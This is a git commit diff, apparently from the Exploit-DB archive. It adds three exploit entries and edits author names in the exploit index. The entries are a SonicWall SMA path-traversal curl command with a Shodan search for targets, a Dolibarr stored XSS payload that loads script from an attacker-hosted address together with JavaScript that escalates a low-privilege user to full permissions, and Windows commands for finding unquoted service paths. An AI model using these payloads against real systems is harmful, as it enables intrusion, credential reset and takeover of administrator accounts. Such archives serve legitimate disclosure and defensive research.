DB: 2021-10-21
3 changes to exploits/shellcodes Macro Expert 4.7 - Unquoted Service Path AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion xKiosk 3.0.1i - 'xkurl.php?PEARPATH' Remote File Inclusion InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion CMSbright - 'id_rub_page' SQL Injection ParsBlogger - 'blog.asp' SQL Injection Blog System 1.x - 'note' SQL Injection PHP Joke Site Software - 'sbjoke_id' SQL Injection PHP Classifieds ADS - 'sid' Blind SQL Injection Softbiz Article Directory Script - 'sbiz_id' Blind SQL Injection Storyteller CMS - 'var' Local File Inclusion MyPhpAuction 2010 - 'id' SQL Injection PHP Lowbids - 'viewfaqs.php' Blind SQL Injection BetMore Site Suite 4 - 'bid' Blind SQL Injection PHP auctions - 'viewfaqs.php' Blind SQL Injection PHP Coupon Script 6.0 - 'bus' Blind SQL Injection PHP Link Directory Software - 'sbcat_id' SQL Injection PHP Classified ads software - 'cid' Blind SQL Injection PHP Script Directory Software - 'sbcat_id' SQL Injection PHP Link Directory Software - 'sbcat_id' SQL Injection PHP Classified ads software - 'cid' Blind SQL Injection PHP Script Directory Software - 'sbcat_id' SQL Injection Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion Holtstraeter Rot 13 - 'Enkrypt.php' Directory Traversal easyGB 2.1.1 - 'index.php' Local File Inclusion PHPAuctions - 'viewfaqs.php' SQL Injection SonicWall SMA 10.2.1.0-17sv - Password Reset Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation
This commit is contained in:
parent
b17b7fe4b2
commit
2ee235ed78
4 changed files with 122 additions and 23 deletions
12
exploits/hardware/webapps/50430.txt
Normal file
12
exploits/hardware/webapps/50430.txt
Normal file
|
@ -0,0 +1,12 @@
|
|||
# Exploit Title: SonicWall SMA 10.2.1.0-17sv - Password Reset
|
||||
# Description: Overwrite the persistent database, resulting in password reset on reboot.
|
||||
# Shodan Dork: https://www.shodan.io/search?query=title%3A%22Virtual+Office%22+%22Server%3A+SonicWall%22
|
||||
# Date: 10/19/2021
|
||||
# Exploit Author: Jacob Baines (@Junior_Baines)
|
||||
# Root Cause Analysis: https://attackerkb.com/topics/23t9VCbGzt/cve-2021-20034/rapid7-analysis?referrer=profile
|
||||
# Vendor Homepage: https://www.sonicwall.com/
|
||||
# Version: SMA 100 Series using 9.0.0.10-28sv, 10.2.0.7-34sv, and 10.2.1.0-17sv
|
||||
# Tested on: SMA 500v using 9.0.0.10-28sv and 10.2.1.0-17sv
|
||||
# CVE : CVE-2021-20034
|
||||
|
||||
curl -v --insecure "https://10.0.0.6/cgi-bin/handleWAFRedirect?hdl=../flash/etc/EasyAccess/var/conf/persist.db"
|
48
exploits/php/webapps/50432.txt
Normal file
48
exploits/php/webapps/50432.txt
Normal file
|
@ -0,0 +1,48 @@
|
|||
# Exploit Title: Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation
|
||||
# Exploit Author: Oscar Gutierrez (m4xp0w3r)
|
||||
# Date: 18/10/2021
|
||||
# Vendor Homepage: https://www.dolibarr.org/
|
||||
# Software Link: https://github.com/Dolibarr
|
||||
# Tested on: Ubuntu, LAAMP
|
||||
# Vendor: Dolibarr
|
||||
# Version: v14.0.2
|
||||
|
||||
# Exploit Description:
|
||||
# Dolibarr ERP & CRM v14.0.2 suffers from a stored XSS vulnerability in the ticket creation flow that allows a low level user (with full access to the Tickets module) to achieve full permissions. For this attack vector to work, an administrator user needs to copy the text in the "message" box.
|
||||
# Instructions:
|
||||
#1. Insert this payload in the message box when creating a ticket: "><span onbeforecopy="let pwned = document.createElement('script'); pwned.setAttribute('src', 'http://YOURIPGOESHERE/hax.js'); document.body.appendChild(pwned);" contenteditable>test</span>
|
||||
#
|
||||
#2. Host this file (Change the extension of the file to js and remove comments) in a remote http location of your preference.
|
||||
#NOTE: The user id in /dolibarr/htdocs/user/perms.php?id=2 may vary depending on the installation so you might have to change this. In my case, I had only 2 users, user 2 being the low level user.
|
||||
#
|
||||
#3.Once an administrator user copies the text within the ticket the attack will launch.
|
||||
|
||||
function read_body(xhr) {
|
||||
|
||||
var data = xhr.responseXML;
|
||||
var tokenizedUrl = data.getElementsByClassName("reposition commonlink")[0].href;
|
||||
console.log(tokenizedUrl);
|
||||
return tokenizedUrl;
|
||||
|
||||
}
|
||||
|
||||
function escalatePrivs() {
|
||||
var url = read_body(xhr);
|
||||
var http = new XMLHttpRequest();
|
||||
http.open('GET', url);
|
||||
http.onreadystatechange = function() {
|
||||
if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
|
||||
return;
|
||||
}
|
||||
};
|
||||
http.send(null);
|
||||
}
|
||||
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.onreadystatechange = function() {
|
||||
if (xhr.readyState == XMLHttpRequest.DONE) {
|
||||
read_body(xhr);
|
||||
escalatePrivs(xhr);
|
||||
}
|
||||
}
|
||||
xhr.open('GET', '/dolibarr/htdocs/user/perms.php?id=2', true);
|
36
exploits/windows/local/50431.txt
Normal file
36
exploits/windows/local/50431.txt
Normal file
|
@ -0,0 +1,36 @@
|
|||
# Exploit Title: Macro Expert 4.7 - Unquoted Service Path
|
||||
# Exploit Author: Mert DAŞ
|
||||
# Version: 3.11.8
|
||||
# Date: 20.10.2021
|
||||
# Vendor Homepage: http://www.macro-expert.com/
|
||||
# Tested on: Windows 10
|
||||
|
||||
C:\Users\Mert>sc qc "Macro Expert"
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: Macro Expert
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : c:\program files (x86)\grasssoft\macro
|
||||
expert\MacroService.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : Macro Expert
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
---------------------------------------------
|
||||
|
||||
Or:
|
||||
-------------------------
|
||||
C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr
|
||||
/i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
|
||||
|
||||
|
||||
#Exploit:
|
||||
|
||||
A successful attempt would require the local user to be able to insert
|
||||
their code in the system root path undetected by the OS or other security
|
||||
applications where it could potentially be executed during application
|
||||
startup or reboot. If successful, the local user's code would execute with
|
||||
the elevated privileges of the application.
|
|
@ -11349,6 +11349,7 @@ id,file,description,date,author,type,platform,port
|
|||
50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
|
||||
50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
|
||||
50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
|
||||
50431,exploits/windows/local/50431.txt,"Macro Expert 4.7 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
||||
|
@ -20047,7 +20048,7 @@ id,file,description,date,author,type,platform,port
|
|||
3455,exploits/php/webapps/3455.html,"JobSitePro 1.0 - 'search.php' SQL Injection",1970-01-01,ajann,webapps,php,
|
||||
3456,exploits/php/webapps/3456.pl,"Top Auction 1.0 - 'viewcat.php' SQL Injection",1970-01-01,ajann,webapps,php,
|
||||
3457,exploits/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - 'index.php' SQL Injection",1970-01-01,ajann,webapps,php,
|
||||
3458,exploits/php/webapps/3458.txt,"AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
3458,exploits/php/webapps/3458.txt,"AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure",1970-01-01,h4ck3r,webapps,php,
|
||||
3459,exploits/php/webapps/3459.txt,"cPanel 10.9.x - 'Fantastico' Local File Inclusion",1970-01-01,"cyb3rt & 020",webapps,php,
|
||||
3465,exploits/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",1970-01-01,K-159,webapps,php,
|
||||
3466,exploits/asp/webapps/3466.txt,"BP Blog 7.0 - 'layout' SQL Injection",1970-01-01,BeyazKurt,webapps,asp,
|
||||
|
@ -20638,7 +20639,7 @@ id,file,description,date,author,type,platform,port
|
|||
4443,exploits/php/webapps/4443.txt,"ClanSphere 2007.4 - 'cat_id' SQL Injection",1970-01-01,IHTeam,webapps,php,
|
||||
4444,exploits/php/webapps/4444.txt,"Black Lily 2007 - 'products.php?class' SQL Injection",1970-01-01,VerY-SecReT,webapps,php,
|
||||
4446,exploits/php/webapps/4446.txt,"Wordsmith 1.1b - 'config.inc.php?_path' Remote File Inclusion",1970-01-01,ShockShadow,webapps,php,
|
||||
4447,exploits/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
4447,exploits/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion",1970-01-01,h4ck3r,webapps,php,
|
||||
4448,exploits/php/webapps/4448.txt,"helplink 0.1.0 - 'show.php' Remote File Inclusion",1970-01-01,GoLd_M,webapps,php,
|
||||
4449,exploits/php/webapps/4449.txt,"phpFullAnnu (PFA) 6.0 - SQL Injection",1970-01-01,IHTeam,webapps,php,
|
||||
4451,exploits/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusions",1970-01-01,BiNgZa,webapps,php,
|
||||
|
@ -20680,7 +20681,7 @@ id,file,description,date,author,type,platform,port
|
|||
4499,exploits/php/webapps/4499.txt,"Joomla! Component mosmedialite451 - Remote File Inclusion",1970-01-01,k1n9k0ng,webapps,php,
|
||||
4500,exploits/php/webapps/4500.txt,"TorrentTrader Classic 1.07 - Multiple Vulnerabilities",1970-01-01,"HACKERS PAL",webapps,php,
|
||||
4501,exploits/php/webapps/4501.php,"PHP Homepage M 1.0 - 'galerie.php' SQL Injection",1970-01-01,"[PHCN] Mahjong",webapps,php,
|
||||
4502,exploits/php/webapps/4502.txt,"xKiosk 3.0.1i - 'xkurl.php?PEARPATH' Remote File Inclusion",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
4502,exploits/php/webapps/4502.txt,"xKiosk 3.0.1i - 'xkurl.php?PEARPATH' Remote File Inclusion",1970-01-01,h4ck3r,webapps,php,
|
||||
4503,exploits/php/webapps/4503.txt,"LiveAlbum 0.9.0 - 'common.php' Remote File Inclusion",1970-01-01,S.W.A.T.,webapps,php,
|
||||
4504,exploits/php/webapps/4504.txt,"Softbiz Jobs & Recruitment - SQL Injection",1970-01-01,"Khashayar Fereidani",webapps,php,
|
||||
4505,exploits/php/webapps/4505.php,"LightBlog 8.4.1.1 - Remote Code Execution",1970-01-01,BlackHawk,webapps,php,
|
||||
|
@ -20716,7 +20717,7 @@ id,file,description,date,author,type,platform,port
|
|||
4554,exploits/php/webapps/4554.txt,"Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion",1970-01-01,BiNgZa,webapps,php,
|
||||
4555,exploits/php/webapps/4555.txt,"TOWeLS 0.1 - 'scripture.php' Remote File Inclusion",1970-01-01,GoLd_M,webapps,php,
|
||||
4557,exploits/php/webapps/4557.txt,"Simple PHP Blog (sPHPblog) 0.5.1 - Multiple Vulnerabilities",1970-01-01,DarkFig,webapps,php,
|
||||
4558,exploits/php/webapps/4558.txt,"InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
4558,exploits/php/webapps/4558.txt,"InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion",1970-01-01,h4ck3r,webapps,php,
|
||||
4561,exploits/php/webapps/4561.txt,"Flatnuke 3 - Remote Command Execution / Privilege Escalation",1970-01-01,KiNgOfThEwOrLd,webapps,php,
|
||||
4562,exploits/php/webapps/4562.txt,"Flatnuke 3 - Remote Cookie Manipulation / Privilege Escalation",1970-01-01,KiNgOfThEwOrLd,webapps,php,
|
||||
4563,exploits/php/webapps/4563.txt,"PHP-Nuke platinum 7.6.b.5 - Remote File Inclusion",1970-01-01,BiNgZa,webapps,php,
|
||||
|
@ -22060,7 +22061,7 @@ id,file,description,date,author,type,platform,port
|
|||
6339,exploits/php/webapps/6339.txt,"webid 0.5.4 - Multiple Vulnerabilities",1970-01-01,InjEctOr5,webapps,php,
|
||||
6341,exploits/php/webapps/6341.txt,"WeBid 0.5.4 - 'item.php' SQL Injection",1970-01-01,Stack,webapps,php,
|
||||
6342,exploits/php/webapps/6342.txt,"EasyClassifields 3.0 - 'go' SQL Injection",1970-01-01,e.wiZz!,webapps,php,
|
||||
6343,exploits/php/webapps/6343.txt,"CMSbright - 'id_rub_page' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
6343,exploits/php/webapps/6343.txt,"CMSbright - 'id_rub_page' SQL Injection",1970-01-01,h4ck3r,webapps,php,
|
||||
6344,exploits/php/webapps/6344.php,"WeBid 0.5.4 - 'FCKeditor' Arbitrary File Upload",1970-01-01,Stack,webapps,php,
|
||||
6346,exploits/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection",1970-01-01,"Virangar Security",webapps,php,
|
||||
6347,exploits/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - 'artid' SQL Injection",1970-01-01,MustLive,webapps,php,
|
||||
|
@ -22759,7 +22760,7 @@ id,file,description,date,author,type,platform,port
|
|||
40987,exploits/php/webapps/40987.txt,"My Click Counter 1.0 - Authentication Bypass",1970-01-01,Adam,webapps,php,
|
||||
7237,exploits/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",1970-01-01,otmorozok428,webapps,php,
|
||||
7238,exploits/php/webapps/7238.txt,"Post Affiliate Pro 3 - 'umprof_status' Blind SQL Injection",1970-01-01,XaDoS,webapps,php,
|
||||
7239,exploits/php/webapps/7239.txt,"ParsBlogger - 'blog.asp' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
7239,exploits/php/webapps/7239.txt,"ParsBlogger - 'blog.asp' SQL Injection",1970-01-01,h4ck3r,webapps,php,
|
||||
7240,exploits/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",1970-01-01,b3hz4d,webapps,php,
|
||||
7241,exploits/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - Local File Inclusion",1970-01-01,"CWH Underground",webapps,php,
|
||||
7242,exploits/php/webapps/7242.txt,"Web Calendar System 3.12/3.30 - Multiple Vulnerabilities",1970-01-01,Bl@ckbe@rD,webapps,php,
|
||||
|
@ -24991,7 +24992,7 @@ id,file,description,date,author,type,platform,port
|
|||
11212,exploits/asp/webapps/11212.txt,"eWebeditor - Directory Traversal",1970-01-01,anonymous,webapps,asp,
|
||||
11213,exploits/php/webapps/11213.txt,"Joomla! Component com_book - SQL Injection",1970-01-01,Evil-Cod3r,webapps,php,
|
||||
11215,exploits/windows/webapps/11215.txt,"SHOUTcast Server 1.9.8/Win32 - Cross-Site Request Forgery",1970-01-01,cp77fk4r,webapps,windows,
|
||||
11216,exploits/php/webapps/11216.txt,"Blog System 1.x - 'note' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
11216,exploits/php/webapps/11216.txt,"Blog System 1.x - 'note' SQL Injection",1970-01-01,h4ck3r,webapps,php,
|
||||
11218,exploits/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Arbitrary File Upload",1970-01-01,k4cp3r/Ablus,webapps,multiple,
|
||||
11222,exploits/php/webapps/11222.txt,"Joomla! Component com_gameserver - SQL Injection",1970-01-01,B-HUNT3|2,webapps,php,
|
||||
11223,exploits/php/webapps/11223.txt,"Joomla! Component com_avosbillets - SQL Injection",1970-01-01,snakespc,webapps,php,
|
||||
|
@ -26586,14 +26587,14 @@ id,file,description,date,author,type,platform,port
|
|||
14854,exploits/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass",1970-01-01,Abysssec,webapps,php,
|
||||
14851,exploits/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",1970-01-01,Andre_Corleone,webapps,php,
|
||||
14870,exploits/asp/webapps/14870.txt,"rainbowportal - Multiple Vulnerabilities",1970-01-01,Abysssec,webapps,asp,
|
||||
14860,exploits/php/webapps/14860.txt,"PHP Joke Site Software - 'sbjoke_id' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
14860,exploits/php/webapps/14860.txt,"PHP Joke Site Software - 'sbjoke_id' SQL Injection",1970-01-01,h4ck3r,webapps,php,
|
||||
14867,exploits/php/webapps/14867.txt,"vbShout 5.2.2 - Local/Remote File Inclusion",1970-01-01,fred777,webapps,php,
|
||||
14876,exploits/php/webapps/14876.txt,"Shop a la Cart - Multiple Vulnerabilities",1970-01-01,Ariko-Security,webapps,php,
|
||||
14879,exploits/asp/webapps/14879.txt,"visinia 1.3 - Multiple Vulnerabilities",1970-01-01,Abysssec,webapps,asp,
|
||||
14884,exploits/php/webapps/14884.txt,"smbind 0.4.7 - SQL Injection",1970-01-01,r00t,webapps,php,
|
||||
14887,exploits/php/webapps/14887.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (1)",1970-01-01,Abysssec,webapps,php,
|
||||
14890,exploits/php/webapps/14890.py,"mBlogger 1.0.04 - 'addcomment.php' Persistent Cross-Site Scripting",1970-01-01,"Ptrace Security",webapps,php,
|
||||
14891,exploits/php/webapps/14891.txt,"PHP Classifieds ADS - 'sid' Blind SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
14891,exploits/php/webapps/14891.txt,"PHP Classifieds ADS - 'sid' Blind SQL Injection",1970-01-01,h4ck3r,webapps,php,
|
||||
14893,exploits/php/webapps/14893.txt,"PHP Classifieds 7.3 - Remote File Inclusion",1970-01-01,alsa7r,webapps,php,
|
||||
14894,exploits/php/webapps/14894.py,"A-Blog 2.0 - '/sources/search.php' SQL Injection",1970-01-01,"Ptrace Security",webapps,php,
|
||||
14896,exploits/php/webapps/14896.txt,"Joomla! Component iJoomla! Magazine 3.0.1 - Remote File Inclusion",1970-01-01,LoSt.HaCkEr,webapps,php,
|
||||
|
@ -26603,7 +26604,7 @@ id,file,description,date,author,type,platform,port
|
|||
14902,exploits/php/webapps/14902.txt,"Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injections",1970-01-01,Solidmedia,webapps,php,
|
||||
14913,exploits/asp/webapps/14913.txt,"DMXReady Members Area Manager - Persistent Cross-Site Scripting",1970-01-01,"L0rd CrusAd3r",webapps,asp,
|
||||
14908,exploits/asp/webapps/14908.txt,"DMXready Polling Booth Manager - SQL Injection",1970-01-01,"L0rd CrusAd3r",webapps,asp,
|
||||
14910,exploits/php/webapps/14910.txt,"Softbiz Article Directory Script - 'sbiz_id' Blind SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
14910,exploits/php/webapps/14910.txt,"Softbiz Article Directory Script - 'sbiz_id' Blind SQL Injection",1970-01-01,h4ck3r,webapps,php,
|
||||
14911,exploits/php/webapps/14911.sh,"Joomla! Component Gantry 3.0.10 - Blind SQL Injection",1970-01-01,jdc,webapps,php,
|
||||
14932,exploits/windows/webapps/14932.py,"ColdCalendar 2.06 - SQL Injection",1970-01-01,mr_me,webapps,windows,
|
||||
14914,exploits/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website - SQL Injection",1970-01-01,"L0rd CrusAd3r",webapps,asp,
|
||||
|
@ -26637,7 +26638,7 @@ id,file,description,date,author,type,platform,port
|
|||
14989,exploits/php/webapps/14989.txt,"osDate - 'uploadvideos.php' Arbitrary File Upload",1970-01-01,Xa7m3d,webapps,php,
|
||||
14991,exploits/asp/webapps/14991.txt,"Luftguitar CMS - Upload Arbitrary File",1970-01-01,Abysssec,webapps,asp,
|
||||
14995,exploits/php/webapps/14995.txt,"Joomla! Component com_mtree 2.1.5 - Arbitrary File Upload",1970-01-01,jdc,webapps,php,
|
||||
14996,exploits/php/webapps/14996.txt,"Storyteller CMS - 'var' Local File Inclusion",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
14996,exploits/php/webapps/14996.txt,"Storyteller CMS - 'var' Local File Inclusion",1970-01-01,h4ck3r,webapps,php,
|
||||
14997,exploits/php/webapps/14997.txt,"UCenter Home 2.0 - SQL Injection",1970-01-01,KnocKout,webapps,php,
|
||||
14998,exploits/php/webapps/14998.txt,"Joomla! Component JGen 0.9.33 - SQL Injection",1970-01-01,**RoAd_KiLlEr**,webapps,php,
|
||||
14999,exploits/asp/webapps/14999.txt,"freediscussionforums 1.0 - Multiple Vulnerabilities",1970-01-01,Abysssec,webapps,asp,
|
||||
|
@ -26698,7 +26699,7 @@ id,file,description,date,author,type,platform,port
|
|||
15151,exploits/php/webapps/15151.txt,"Webspell 4.2.1 - 'asearch.php' SQL Injection",1970-01-01,"silent vapor",webapps,php,
|
||||
15152,exploits/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net - static Blind SQL Injection",1970-01-01,"Easy Laster",webapps,php,
|
||||
15153,exploits/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass",1970-01-01,"silent vapor",webapps,php,
|
||||
15154,exploits/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
15154,exploits/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' SQL Injection",1970-01-01,h4ck3r,webapps,php,
|
||||
15160,exploits/asp/webapps/15160.txt,"ASPMass Shopping Cart - Arbitrary File Upload / Cross-Site Request Forgery",1970-01-01,Abysssec,webapps,asp,
|
||||
15162,exploits/php/webapps/15162.rb,"Joomla! Component JE Job - SQL Injection",1970-01-01,"Easy Laster",webapps,php,
|
||||
15163,exploits/php/webapps/15163.rb,"Joomla! Component JE Directory 1.0 - SQL Injection",1970-01-01,"Easy Laster",webapps,php,
|
||||
|
@ -27079,13 +27080,13 @@ id,file,description,date,author,type,platform,port
|
|||
15981,exploits/php/webapps/15981.txt,"LifeType 1.2.10 - HTTP Referer Persistent Cross-Site Scripting",1970-01-01,"Saif El-Sherei",webapps,php,
|
||||
15979,exploits/php/webapps/15979.txt,"Joomla! 1.5.22 / 1.6.0 - 'com_mailto' Spam Mail Relay",1970-01-01,"Jeff Channell",webapps,php,
|
||||
15987,exploits/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",1970-01-01,"Spencer McIntyre",webapps,cgi,
|
||||
16020,exploits/php/webapps/16020.txt,"PHP Lowbids - 'viewfaqs.php' Blind SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
16020,exploits/php/webapps/16020.txt,"PHP Lowbids - 'viewfaqs.php' Blind SQL Injection",1970-01-01,h4ck3r,webapps,php,
|
||||
15989,exploits/php/webapps/15989.txt,"Joomla! Component People 1.0.0 - SQL Injection",1970-01-01,"Salvatore Fresta",webapps,php,
|
||||
15993,exploits/php/webapps/15993.html,"ViArt Shop 4.0.5 - Cross-Site Request Forgery",1970-01-01,Or4nG.M4N,webapps,php,
|
||||
15995,exploits/php/webapps/15995.txt,"glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting",1970-01-01,Saif,webapps,php,
|
||||
15996,exploits/php/webapps/15996.txt,"CompactCMS 1.4.1 - Multiple Vulnerabilities",1970-01-01,"Patrick de Brouwer",webapps,php,
|
||||
15997,exploits/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution",1970-01-01,mr_me,webapps,jsp,
|
||||
15999,exploits/php/webapps/15999.txt,"BetMore Site Suite 4 - 'bid' Blind SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
15999,exploits/php/webapps/15999.txt,"BetMore Site Suite 4 - 'bid' Blind SQL Injection",1970-01-01,h4ck3r,webapps,php,
|
||||
16000,exploits/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent Cross-Site Scripting",1970-01-01,"Mark Stanislav",webapps,php,
|
||||
16001,exploits/php/webapps/16001.txt,"Joomla! Component com_people 1.0.0 - Local File Inclusion",1970-01-01,ALTBTA,webapps,php,
|
||||
16003,exploits/php/webapps/16003.txt,"AWBS 2.9.2 - 'cart.php' Blind SQL Injection",1970-01-01,ShivX,webapps,php,
|
||||
|
@ -27097,11 +27098,11 @@ id,file,description,date,author,type,platform,port
|
|||
17209,exploits/php/webapps/17209.txt,"SoftMP3 - SQL Injection",1970-01-01,mArTi,webapps,php,
|
||||
16016,exploits/php/webapps/16016.txt,"Simploo CMS 1.7.1 - PHP Code Execution",1970-01-01,"David Vieira-Kurz",webapps,php,
|
||||
16039,exploits/php/webapps/16039.txt,"Joomla! Component com_b2portfolio 1.0.0 - Multiple SQL Injections",1970-01-01,"Salvatore Fresta",webapps,php,
|
||||
16018,exploits/php/webapps/16018.txt,"PHP auctions - 'viewfaqs.php' Blind SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
16018,exploits/php/webapps/16018.txt,"PHP auctions - 'viewfaqs.php' Blind SQL Injection",1970-01-01,h4ck3r,webapps,php,
|
||||
16019,exploits/php/webapps/16019.txt,"phpCMS 2008 - SQL Injection",1970-01-01,R3d-D3V!L,webapps,php,
|
||||
16027,exploits/php/webapps/16027.txt,"phpCMS 9.0 - Blind SQL Injection",1970-01-01,eidelweiss,webapps,php,
|
||||
16028,exploits/php/webapps/16028.txt,"cultbooking 2.0.4 - Multiple Vulnerabilities",1970-01-01,LiquidWorm,webapps,php,
|
||||
16034,exploits/php/webapps/16034.txt,"PHP Coupon Script 6.0 - 'bus' Blind SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
16034,exploits/php/webapps/16034.txt,"PHP Coupon Script 6.0 - 'bus' Blind SQL Injection",1970-01-01,h4ck3r,webapps,php,
|
||||
16037,exploits/php/webapps/16037.html,"PHP Link Directory 4.1.0 - Cross-Site Request Forgery (Add Admin)",1970-01-01,AtT4CKxT3rR0r1ST,webapps,php,
|
||||
16060,exploits/php/webapps/16060.txt,"comercioplus 5.6 - Multiple Vulnerabilities",1970-01-01,"Daniel Godoy",webapps,php,
|
||||
16044,exploits/php/webapps/16044.txt,"ab Web CMS 1.35 - Multiple Vulnerabilities",1970-01-01,"Dr.0rYX & Cr3W-DZ",webapps,php,
|
||||
|
@ -27113,9 +27114,9 @@ id,file,description,date,author,type,platform,port
|
|||
16054,exploits/windows/webapps/16054.txt,"sap crystal report server 2008 - Directory Traversal",1970-01-01,"Dmitriy Chastuhin",webapps,windows,
|
||||
16058,exploits/php/webapps/16058.txt,"MultiPowUpload 2.1 - Arbitrary File Upload",1970-01-01,DIES3L,webapps,php,
|
||||
16059,exploits/php/webapps/16059.txt,"Xnova Legacies 2009.2 - Cross-Site Request Forgery",1970-01-01,"Xploit A Day",webapps,php,
|
||||
16061,exploits/php/webapps/16061.txt,"PHP Link Directory Software - 'sbcat_id' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
16062,exploits/php/webapps/16062.txt,"PHP Classified ads software - 'cid' Blind SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
16069,exploits/php/webapps/16069.txt,"PHP Script Directory Software - 'sbcat_id' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
16061,exploits/php/webapps/16061.txt,"PHP Link Directory Software - 'sbcat_id' SQL Injection",1970-01-01,h4ck3r,webapps,php,
|
||||
16062,exploits/php/webapps/16062.txt,"PHP Classified ads software - 'cid' Blind SQL Injection",1970-01-01,h4ck3r,webapps,php,
|
||||
16069,exploits/php/webapps/16069.txt,"PHP Script Directory Software - 'sbcat_id' SQL Injection",1970-01-01,h4ck3r,webapps,php,
|
||||
16074,exploits/php/webapps/16074.txt,"MultiCMS - Local File Inclusion",1970-01-01,R3VAN_BASTARD,webapps,php,
|
||||
16076,exploits/php/webapps/16076.txt,"vBSEO 3.2.2/3.5.2 - Persistent Cross-Site Scripting via LinkBacks",1970-01-01,MaXe,webapps,php,
|
||||
16077,exploits/php/webapps/16077.txt,"vBSEO Sitemap 2.5/3.0 - Multiple Vulnerabilities",1970-01-01,MaXe,webapps,php,
|
||||
|
@ -33412,12 +33413,12 @@ id,file,description,date,author,type,platform,port
|
|||
29731,exploits/php/webapps/29731.txt,"SoftNews 4.1/5.5 - '/engine/Ajax/editnews.php?root_dir' Remote File Inclusion",1970-01-01,"Hasadya Raed",webapps,php,
|
||||
29733,exploits/php/webapps/29733.txt,"PHP-Nuke 8.2.4 - Multiple Vulnerabilities",1970-01-01,"Sojobo dev team",webapps,php,80
|
||||
29736,exploits/php/webapps/29736.txt,"ClipShare 1.5.3 - 'ADODB-Connection.Inc.php' Remote File Inclusion",1970-01-01,"RaeD Hasadya",webapps,php,
|
||||
29737,exploits/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion",1970-01-01,"BorN To K!LL",webapps,php,
|
||||
